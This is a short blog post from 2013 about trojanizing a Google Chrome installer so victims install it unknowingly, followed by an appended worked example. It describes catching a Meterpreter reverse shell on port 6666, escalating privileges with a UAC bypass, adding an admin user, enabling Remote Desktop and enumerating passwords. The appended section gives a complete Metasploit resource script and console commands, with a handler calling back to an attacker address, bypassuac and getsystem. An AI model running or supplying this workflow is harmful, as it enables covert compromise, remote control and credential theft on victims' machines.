Wednesday, February 6, 2013

Fun backdooring Google-Chrome

*note: the backdooring technique itself will NOT be covered here!
The backdoored Google-Chrome installer, custom-made to look like the authentic Chrome installer.

After the victim runs our .exe, Google-Chrome installs and is fully functional, so nothing looks out of place on the victim's side.

Attacking Machine:

Waiting on the attacking machine is a Metasploit handler listening for the reverse connection on port 6666. When the trojanized installer runs, the payload connects back and we get a Meterpreter session.
The ps command lists the running processes on the Windows machine.
Notice that the processes we can see are running as no-update\victim, an ordinary user account. This means the session only has "user" privileges; we need to find a way to escalate to "admin".
Using Metasploit's local privilege escalation exploit, which bypasses UAC and escalates our privileges to "admin". Note that this only works when the account is a member of the local Administrators group and is merely running with a UAC-filtered token; a genuine standard user cannot be escalated this way, and it also fails if UAC is set to "Always notify".
Set the module options and run it.
Now we can add ourselves as an "admin" user, enable Remote Desktop, enumerate passwords on the system, and so on.
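The full console workflow the post walks through, as an added example that is not from the original post: the handler is set up as a resource script, then the privilege check and the UAC bypass are run once the session checks in. The attacker address 192.0.2.10, the second handler port 6667, the session ID 1 and the module name exploit/windows/local/bypassuac are assumptions; the post itself only states the listener port 6666 and the victim account no-update\victim.

```text
# handler.rc (assumed filename): Metasploit resource script for the listener
# the post describes. Start it with:  msfconsole -r handler.rc
# 192.0.2.10 is an assumed attacker address; the post states only the port.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.0.2.10
set LPORT 6666
set ExitOnSession false
exploit -j -z

# Once the victim runs the trojanized installer, a session checks in.
# The lines below are typed at the console (session ID 1 assumed).
sessions -i 1
getuid
ps
# getuid and ps show the session running as no-update\victim, a UAC-limited
# account. Background the session and escalate. bypassuac needs a second
# handler for the elevated session, hence the separate LPORT.
background
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.0.2.10
set LPORT 6667
exploit

# In the new, elevated session, confirm the result and go to SYSTEM.
getuid
getsystem
getuid
```

The second getuid after getsystem should report NT AUTHORITY\SYSTEM. If the victim account is not in the local Administrators group, bypassuac stops and says so instead of returning a session; in that case a different local exploit or credential material is needed.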
